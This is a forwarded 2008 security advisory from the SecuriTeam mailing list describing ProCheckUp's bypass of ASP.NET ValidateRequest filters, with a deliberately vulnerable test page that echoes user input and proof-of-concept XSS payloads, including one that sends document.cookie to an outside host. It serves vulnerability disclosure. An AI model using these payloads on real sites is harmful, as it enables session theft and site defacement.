发件人: SecuriTeam [mailto:[EMAIL PROTECTED] 发送时间: 2008年8月29日 18:23 收件人: [EMAIL PROTECTED] 主题: [NT] Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET ValidateRequest filters and perform XSS and HTML injection even against systems protected with the MS07-040 patch. This patch fixed the payload reported in ProCheckUp security bulletin PR07-03. It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application setup in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customer's live environments. Proof of concept: In the following examples, 'test3.aspx' is a script that solely relies on ASP .NET ValidateRequest filters, and returns user-supplied input back to the browser. <html> <head><title>test3.aspx</title><script>document.cookie='PCUSESSIONID=stealme '</script></head> <body> <form action="test3.aspx" method="get"> Your name: <input type="text" name="fname" size="20" /> <input type="submit" value="Submit" /> </form> <% dim fname fname=Request.QueryString("fname") If fname<>"" Then Response.Write("Hello " & "<tagname " & fname & "!<br />") Response.Write("How are you today?") End If %> </body> </html> Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer) http://target.foo/test3.aspx?fname= <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> Cookie stealing http://target.foo/test3.aspx?fname= <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location= "http://www.procheckup.com/?sid="%2bdocument.cookie)> Consequences: Attackers can potentially launch XSS and HTML injection attacks against vulnerable applications that solely rely on ASP .NET ValidateRequest filters. Such code would run within the context of the target domain. This type of attack can result in defacement of the target site, or the redirection of confidential information (i.e.: session IDs or passwords) to unauthorised third parties. Solution: See How To: <http://msdn.microsoft.com/en-us/library/bb355989.aspx> Protect >From Injection Attacks in ASP.NET for more details. References: http://msdn.microsoft.com/en-us/library/bb355989.aspx http://msdn.microsoft.com/en-us/library/ms972969.aspx#securitybarriers_topic 6 Additional Information: The information has been provided by ProCheckUp <mailto:[EMAIL PROTECTED] com> Research. The original article can be found at: http://www.procheckup.com/Vulnerability_PR08-20.php ============================================================================ ==== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [EMAIL PROTECTED] In order to subscribe to the mailing list and receive advisories in HTML format, simply forward this email to: [EMAIL PROTECTED] ============================================================================ ==== ============================================================================ ==== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
